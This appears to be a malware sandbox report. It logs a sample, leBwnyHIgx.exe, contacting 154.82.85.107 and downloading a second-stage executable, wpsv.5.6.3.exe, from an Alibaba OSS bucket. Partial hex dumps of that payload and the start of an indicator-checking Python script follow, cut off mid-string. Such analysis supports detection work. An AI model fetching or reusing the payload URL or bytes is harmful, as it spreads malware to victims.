                                                                                  Jan 8, 2025 07:15:34.254672050 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254683018 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254702091 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254725933 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.254746914 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.254779100 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254791021 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254801989 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.254842997 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.259716034 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.259727955 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.259738922 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.259773016 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.259810925 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479326963 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479361057 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479373932 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479408979 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479418993 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479453087 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479463100 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479465961 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479511023 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.479572058 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479583979 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479598999 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.479629040 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.480587959 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480598927 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480611086 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480635881 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.480648994 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.480776072 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480788946 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480799913 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.480824947 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.481590033 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481601954 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481612921 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481642008 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.481654882 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.481767893 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481780052 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481791019 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.481817961 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.482244015 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.482264042 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.482305050 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.482326984 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.482376099 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704380989 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704416990 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704431057 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704479933 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704521894 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704534054 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704545021 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704556942 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704574108 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704603910 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704802036 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704850912 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.704854012 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704866886 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.704929113 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705019951 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705032110 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705044031 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705080032 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705552101 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705571890 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705585003 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705600977 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705630064 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705728054 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705740929 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705750942 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705764055 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.705776930 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.705820084 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.706485033 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706496000 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706509113 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706545115 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.706938028 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706949949 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706960917 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.706990957 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.707024097 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.707046986 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708884954 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708897114 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708909035 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708921909 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708933115 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708940029 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.708945036 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.708970070 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.749438047 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929138899 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929158926 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929172993 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929188013 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929229975 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929244995 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929253101 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929300070 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929313898 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929373980 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929429054 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929523945 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929569960 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929583073 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929641008 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929915905 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929934978 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.929935932 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929950953 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.929992914 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930016994 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930270910 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930284023 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930294991 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930296898 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930329084 CET4974015091192.168.2.4154.82.85.107
                                                                                  Jan 8, 2025 07:15:34.930417061 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930428982 CET1509149740154.82.85.107192.168.2.4
                                                                                  Jan 8, 2025 07:15:34.930439949 CET1509149740154.82.85.107192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 07:15:03.068156004 CET | 52813 | 53 | 192.168.2.4 | 1.1.1.1
Jan 8, 2025 07:15:03.337126970 CET | 53 | 52813 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 07:15:03.068156004 CET | 192.168.2.4 | 1.1.1.1 | 0xdfbc | Standard query (0) | xrpy.oss-ap-southeast-1.aliyuncs.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 07:15:03.337126970 CET | 1.1.1.1 | 192.168.2.4 | 0xdfbc | No error (0) | xrpy.oss-ap-southeast-1.aliyuncs.com | | 47.79.48.230 | A (IP address) | IN (0x0001) | false
                                                                                  • xrpy.oss-ap-southeast-1.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 47.79.48.230 | 443 | 2004 | C:\Users\user\Desktop\leBwnyHIgx.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-08 06:15:04 UTC | 128 | OUT | GET /wpsv.5.6.3.exe HTTP/1.1
User-Agent: URLDownloader
Host: xrpy.oss-ap-southeast-1.aliyuncs.com
Cache-Control: no-cache
2025-01-08 06:15:05 UTC | 562 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Wed, 08 Jan 2025 06:15:05 GMT
Content-Type: application/octet-stream
Content-Length: 3027728
Connection: close
x-oss-request-id: 677E17E957675839355C7E86
Accept-Ranges: bytes
ETag: "B52BA2B99108C496389AE5BB81FA6537"
Last-Modified: Fri, 27 Dec 2024 16:38:48 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 7602638133618041147
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: tSuiuZEIxJY4muW7gfplNw==
x-oss-server-time: 10
                                                                                  2025-01-08 06:15:05 UTC15822INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 71 a0 86 ad 35 c1 e8 fe 35 c1 e8 fe 35 c1 e8 fe 6e a9 eb ff 2e c1 e8 fe 6e a9 ed ff e6 c1 e8 fe ab 61 2f fe 3c c1 e8 fe e0 ac ec ff 26 c1 e8 fe e0 ac eb ff 2f c1 e8 fe 6e a9 ef ff 34 c1 e8 fe 6e a9 ee ff 34 c1 e8 fe e0 ac ed ff ab c1 e8 fe 6e a9 ec ff 15 c1 e8 fe 6e a9 e9 ff 36 c1 e8 fe 35 c1 e8 fe 20 c1 e8 fe 97 af ec ff 96 c3 e8 fe 35 c1 e9 fe 56 c3 e8 fe 97 af ed ff b8 c1 e8
                                                                                  Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$q555n.na/<&/n4n4nn65 5V
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: e7 7e 20 a6 11 fb 69 3d b7 c4 41 2d 08 0c 52 a9 34 d8 d9 4d 02 02 04 d6 ce b7 a4 04 26 15 31 08 f0 26 7a 23 29 68 08 fb 4c 15 9f 22 c6 c6 c0 be 7c 00 54 7e a0 4c 4a 04 09 f1 09 18 9b a8 02 ae ac 23 9c 23 c3 0b 0c 9c 96 27 05 1b 8a 55 8c 6e a3 42 ff 08 8d 6d 08 80 fa 94 7e fe a1 db 84 83 44 80 05 0b 4e d0 2f 94 e4 0c 3c d1 e9 3a d1 54 1a 3c df ea 89 e8 18 89 18 39 06 06 99 99 6d 1a 11 07 d1 e7 24 48 22 48 2e df 66 ed 20 e7 2a d3 14 c3 94 d0 00 d4 a5 3b d3 e0 0c d3 06 70 99 03 e7 33 a5 41 03 ab 0d 08 c0 0a 31 6b a6 29 95 0a 0a 1c cb 30 d0 16 1d 9c 91 03 26 40 44 c5 06 a7 43 f9 ba b4 24 f8 0e fc b1 8e c8 14 0f d5 25 89 19 95 9a 01 0a 17 f8 82 01 c0 cb 07 bc 48 03 4c 03 40 38 4f 81 eb 10 08 06 70 4d 1c bf d0 13 81 01 c0 f6 dc 34 89 56 f3 e7 69 f6 79 4c 18 1c
                                                                                  Data Ascii: ~ i=A-R4M&1&z#)hL"|T~LJ##'UnBm~DN/<:T<9m$H"H.f *;p3A1k)0&@DC$%HL@8OpM4ViyL
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 04 ff 20 c0 63 0b 4d d5 80 78 b7 ff ff ff 82 05 51 62 09 f9 11 bd de c0 7d 3f f2 30 fb 41 68 39 b0 c2 2e 33 4e a7 85 c4 d1 f9 78 ff ff bf eb ef e9 7c 66 13 1a f5 97 de f0 bb 67 f9 9b ab ee 86 73 9b 23 6c 56 0d a0 da 4c ff ff ff ff ff 2b c5 92 db ee bd ba 3a 54 21 c0 5c fe 21 f1 bd ac af a3 7a 52 62 15 8b 8f b5 82 c6 1a fb 22 e3 ff ff ff bc a2 05 42 fe b4 12 6b ad a9 76 b7 6b 1c d8 34 5c 7d d5 a9 0d 91 f6 c1 47 69 bc ff ff ff bf c2 b7 fc 84 2e a0 8e 3f 52 3b bd 1f 28 6b c8 13 37 d6 44 e9 8d 08 92 96 e5 2c 57 34 59 21 04 ff ff ff ff a8 aa 56 25 a4 c8 ae 68 17 9e a4 f4 42 64 57 4b 54 85 8a d1 09 09 25 18 05 b0 09 9d d9 75 21 d3 ff ff ff ff 75 31 f8 35 46 c8 d4 47 9d 87 eb 40 95 19 24 7c 6e e9 d5 14 aa c3 be 22 18 c1 a0 5f 34 98 c2 4d ff ff ff ff 3f a6 09 57
                                                                                  Data Ascii: cMxQb}?0Ah9.3Nx|fgs#lVL+:T!\!zRb"Bkvk4\}Gi.?R;(k7D,W4Y!V%hBdWKT%u!u15FG@$|n"_4M?W
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 80 ff ff ff bf 12 9f 9d 0a df b5 38 61 89 fb 67 45 9c 39 f9 84 54 c4 d6 6f 00 39 90 82 fa ce ae e8 af a4 97 ff ff bf e8 3a fe 71 14 00 d1 9e 33 41 63 ca a5 5a 8b 09 2a 26 ef 96 b7 5d c4 92 fa 51 db 0d ff ff ff 1d 63 5f 7c 94 53 84 ed a3 99 07 9f dc 55 b3 31 67 1a 63 05 ec 36 79 57 b0 c3 ff ff ff ff dd d5 6a 21 fc 54 e6 28 c4 f1 d2 ce 02 43 50 30 15 4d 3c d0 1c f6 7e d0 a4 86 e7 f5 c2 06 c5 c4 ff ff ff ff a8 e2 d3 c7 cf bd ab 9f e3 42 c4 cd 65 fa d3 cd df 55 c4 ce 6e e8 fc 96 0f e2 92 ca de 37 7c c9 ff 9b fe ff 80 4a 54 e9 fd 3c 4b 81 b8 d9 1a f1 91 5d 9d 7c d1 78 e2 1e 0e 09 62 dd c6 b9 ff ff 55 ff de 29 ba b0 62 49 53 b6 b0 bf 4d 77 a4 d1 0b f0 31 2e e5 71 2e 18 a4 a7 cb a6 fd ff 2f f8 30 24 11 8d 16 ba 6a 19 de 3c 5a 00 a6 e2 43 98 e8 83 10 76 ef ca 67
                                                                                  Data Ascii: 8agE9To9:q3AcZ*&]Qc_|SU1gc6yWj!T(CP0M<~BeUn7|JT<K]|xbU)bISMw1.q./0$j<ZCvg
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 15 55 cd 04 db 73 db ff ff 17 fd 47 5f 83 6e d1 5a 90 bb f7 bb 84 58 ce 75 e8 d2 92 d5 b7 76 f2 94 67 27 5f 32 ff 5f 45 ea 91 3a af 46 92 ce 63 b7 45 27 b4 b8 7a 1e 4e de cb ff ff ff ff c8 5e d3 bb 52 91 d5 72 ad 98 ec 07 a1 56 b4 8e 04 fa 48 3f 17 07 f7 ef 92 61 69 af dd fc 76 03 ff bb fe ff e2 e9 e2 be 5c f2 8a c5 99 51 7f a4 f1 ac 16 86 f5 b8 95 88 87 db 27 2e 63 12 ff ff ff ff 31 7d 6b 2b a0 9b b5 f9 82 42 04 94 ee 60 6e 4e 54 9b fd eb 01 3a ad 42 eb 08 3c 6a a3 f2 46 fb 7f d3 ff ff 18 59 2c a3 0b 22 1d 5d 47 a6 8c 06 9c a1 cc 20 67 bd 76 94 9f c6 10 8c c8 15 ff ff ef fa 52 e3 19 a1 89 02 ad 4f 10 51 0a e4 4b 02 7b 0d 73 2d ae a4 68 1d b6 cf 58 67 fe ff ff ff c0 d0 ca 11 34 31 9e a3 bc 12 28 1e 8e 5a 63 f5 da f2 36 94 63 2c 39 3d f9 80 9f bf 8d ef 1f
                                                                                  Data Ascii: UsG_nZXuvg'_2_E:FcE'zN^RrVH?aiv\Q'.c1}k+B`nNT:B<jFY,"]G gvROQK{s-hXg41(Zc6c,9=
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 81 98 12 4f ec b6 e5 3a 96 a1 11 13 77 5f 0f 19 40 14 28 cc f1 3e 19 ff ff ff 5f a6 31 ac 5c ce d7 29 fa 02 3b 29 d8 3a 37 cb 94 b2 38 c7 7f 3a 46 d2 b7 fe fb 54 7c 01 a2 ff ff aa ff 9b 53 57 04 73 4e 06 90 e5 92 45 67 12 83 d7 31 59 a4 76 aa 7c de 72 92 11 94 ff ff ff 05 c6 e4 35 35 3a 2e ef 7c c1 91 76 d0 fe 84 d1 a1 f9 03 c3 ba 09 bb 2c e2 b5 06 ff ff ff ff 7e 23 b7 e0 c1 d3 fd 55 01 f3 ba c5 1b f8 02 60 92 0a 93 1c c4 19 03 88 f5 45 e5 8f 7d ce 2c 87 ff ff ff ff 2e f6 55 8c f9 b0 d2 72 2d 93 6d 28 6e 8e 3a ed 68 02 da 80 d0 71 4a 8f 06 59 38 89 81 cb 1a 74 ff ff ff ff 1e 62 a3 a5 b8 85 c3 d2 04 3d 3b 93 36 0c 12 55 fb 7b c8 a3 25 a7 93 b0 3e 49 86 bf 76 8f c4 4c ff ff ff ff fe ce 4a f6 2f 15 33 06 3a 35 49 e7 08 ff 99 ac f6 20 6d ab b2 05 a9 e4 06 57
                                                                                  Data Ascii: O:w_@(>_1\);):78:FT|SWsNEg1Yv|r55:.|v,~#U`E},.Ur-m(n:hqJY8tb=;6U{%>IvLJ/3:5I mW
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 5a 20 fa 3d 0a c5 d7 3f a6 c8 9b 76 e0 ec 9e 0b 23 e4 74 36 14 ff ff ff ff 6f 24 9d e7 b2 41 d7 68 37 67 dc 01 b1 20 f9 8b 0b f5 a7 95 78 a0 6c 4b c0 44 92 4a 75 0f 61 de ff ff ff ff c3 c2 3d 17 a0 4d 57 8b 11 35 bd 49 87 05 ba 5d 1f 76 d4 0f b0 5b 5f b7 f8 cf 12 54 19 9a 49 6a ff ff ff ff 42 ad 93 85 0b e7 8c 30 59 82 82 2d d9 89 f5 8c 39 9c f5 cd 25 22 74 cf 56 a2 15 40 a6 a8 fc dc 2a ea ff ff 85 9e ab d6 94 5d d6 73 07 ed 7b 76 11 67 f5 52 ac 1a 69 d0 ff ff ff ff aa 4d 11 e0 c4 4c 6e 9e 8e 13 46 0b 95 40 53 35 53 58 7f 81 5f 17 d7 5e 53 86 f3 1b 70 f1 95 8f ff ff ff ff f6 d4 6f 55 92 a2 38 d3 43 6c 7e a2 21 5b 18 11 dd 03 52 e6 e5 c0 c5 4e 8e da db 91 cf f7 75 c2 ff 6f f8 ff 33 69 d1 d1 29 9d 51 79 91 e4 58 05 a5 6c 16 3e 42 f3 c4 1f 88 94 fc 6b 53 b1
                                                                                  Data Ascii: Z =?v#t6o$Ah7g xlKDJua=MW5I]v[_TIjB0Y-9%"tV@*]s{vgRiMLnF@S5SX_^SpoU8Cl~![RNuo3i)QyXl>BkS
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: c7 74 ff ff 17 fd 08 91 1f d5 4c a9 32 33 ea b0 2c 0a 88 da f7 ca 91 f6 5f 9e 72 f6 18 f9 19 9d 57 8b f8 ff 84 f8 4c e1 eb 45 29 aa f2 a6 fd 64 f9 d2 1c c2 de ff ff ff ff 19 dd 0f 02 16 65 70 33 d4 32 67 7b c4 bb 11 60 4f c3 4d 29 23 7e 84 58 51 43 7e 25 4f 3d d4 e0 17 e0 ff ff 20 79 fd ce 59 49 f8 d1 53 ca 2d 66 ec e5 7f c8 14 06 c1 fc f2 61 a7 ff ff ff ff 1b f9 5e 97 fe 62 57 05 cc 6f 26 4b a6 40 33 72 20 d3 1e 2b b2 60 e7 56 da 87 d3 b4 5a 73 04 c9 ff ff ff ff c2 68 e3 18 74 d9 46 74 31 f4 f4 ab c4 0a bc 66 4e 23 5f 92 7c 0a 81 dd cc 79 ee b3 3d c0 91 81 ff ff ff ff d0 79 39 d2 69 5d dc c1 5c 61 b9 5e 87 32 73 70 d0 a8 7d b5 d0 fc f4 b6 55 9f 1f 8a ec f4 b0 47 a6 ff ff ff eb 3b 68 80 0b 79 d0 71 99 b1 d0 ed 1f 9f 6c 2d 9d ae 1c 62 3b ec 3e 2f b4 fa ff
                                                                                  Data Ascii: tL23,_rWLE)dep32g{`OM)#~XQC~%O= yYIS-fa^bWo&K@3r +`VZshtFt1fN#_|y=y9i]\a^2sp}UG;hyql-b;>/
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: 46 a5 10 08 d1 db fb 9d d4 05 fc ff ff ff 01 5e 66 4d f9 32 9b 5b fe 7a 60 63 77 9a 31 34 e5 9a 82 2d 2b b7 e0 04 8f 86 f3 b2 16 86 ff ff ff 77 96 9d 80 e7 62 df 77 da f4 fc b7 42 9d ac cb 11 ff 0c 6f 4e 16 0c 59 04 05 8f 88 64 ff ff ff ff 37 e6 6c ee 64 58 79 60 d4 2f b7 90 59 fb 82 3b 20 2e 2b ba 15 fb f7 5b 1d 81 8a 8a 8f e3 39 92 ff bf e8 ff 34 fc 3a 67 ce b6 a0 9b 56 78 96 fa bf 9c 83 9e 19 66 20 42 b2 78 62 42 dd df e8 ff ff ff 98 ab 0c 3d 41 b5 74 c1 2d f0 02 58 6e b3 4d 7b 41 1c f1 09 c1 bb 84 67 f8 24 77 ff ff ff bf 56 7a 63 87 0d f2 c5 af e4 b5 c6 3b ad 66 5e ae 90 c2 24 27 7a 0b ed 1b 86 5d 02 19 85 78 c8 ff ff ff ff b1 ce e7 c9 5c ce 43 58 ac 1c 4e cd b8 3a b8 7a f3 79 4b 97 cf be 88 24 d0 9a 5a 55 43 0c 48 a2 ff ff ff ff 7f af 4b d8 16 02 fb
                                                                                  Data Ascii: F^fM2[z`cw14-+wbwBoNYd7ldXy`/Y; .+[94:gVxf BxbB=At-XnM{Ag$wVzc;f^$'z]x\CXN:zyK$ZUCHK
                                                                                  2025-01-08 06:15:05 UTC16384INData Raw: d9 eb 9b 43 c6 d9 c2 10 ab 42 e5 c6 17 fc ff ff 4a e6 3e de 9d ac 8e 95 f0 db 48 95 c2 87 6b 7f de 09 db ed 49 19 38 a4 5c df ff ff ff ff fa 2e 15 d0 b6 46 32 c9 7f 7e 01 d3 25 45 0e 5b 0d f0 67 e3 d9 df 4f 3b 6f b3 15 c5 6b 91 75 a2 ff 77 fc ff af 42 3a 14 50 d9 4f 19 65 12 83 5d 8f 8a f8 89 cc 7f 1a de 5b 44 34 98 0f 8e 9b fe ff ff 5a 5e 03 41 3e 66 9b 16 f5 91 7c b0 c1 bf a2 10 0b 60 3a 63 0c cf d8 d6 42 88 ff ff ff ff 1f 36 8e 15 db 5d 3f e7 f1 9a 73 2b 74 0c d5 09 ab 01 2e 52 6f 03 f6 c9 0b eb a5 ce 2e 1c 02 35 ff ff ff ff ca ce fe 4b ad 67 21 f8 44 ea 70 f2 3d fc 43 77 05 26 be af 99 ab 41 d4 cc 53 33 33 cd b4 2d 76 4a 03 ff ff fb ae 0c ac c1 d0 42 fb 45 4a 6e 55 d2 93 ef b9 58 ff ff ff ff ce 94 c2 01 df 27 c8 47 ff 74 fb 84 c5 a2 78 1f 4f 73 12 ec
                                                                                  Data Ascii: CBJ>HkI8\.F2~%E[gO;okuwB:POe][D4Z^A>f|`:cB6]?s+t.Ro.5Kg!Dp=Cw&AS33-vJBEJnUX'GtxOs
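
The response above carries two server-side integrity values for the downloaded wpsv.5.6.3.exe: Content-MD5, which is the raw digest in base64, and the quoted ETag, which Alibaba OSS fills with the object's MD5 only for single-part uploads. Decoding the one and comparing it with the other yields a hash of the second-stage payload without waiting for the sandbox's file dump, and the first body bytes confirm it is a PE image. The following is an added example, not code from the report or from the sample; the request, the response headers and the first 64 body bytes are copied from the session above, while the function names and the check logic are mine:

```python
"""IOC and integrity checks on the payload download captured above.
Added example, not part of the Joe Sandbox report: the request, response
headers and first 64 body bytes are copied from the session; the checks are mine.
"""
import base64
import struct

REQUEST = """GET /wpsv.5.6.3.exe HTTP/1.1
User-Agent: URLDownloader
Host: xrpy.oss-ap-southeast-1.aliyuncs.com
Cache-Control: no-cache
"""

RESPONSE_HEADERS = """HTTP/1.1 200 OK
Server: AliyunOSS
Date: Wed, 08 Jan 2025 06:15:05 GMT
Content-Type: application/octet-stream
Content-Length: 3027728
Connection: close
x-oss-request-id: 677E17E957675839355C7E86
Accept-Ranges: bytes
ETag: "B52BA2B99108C496389AE5BB81FA6537"
Last-Modified: Fri, 27 Dec 2024 16:38:48 GMT
x-oss-object-type: Normal
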